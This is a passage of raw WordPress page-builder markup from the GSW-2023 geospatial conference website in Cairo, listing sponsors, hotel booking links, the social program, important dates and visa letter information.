src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" 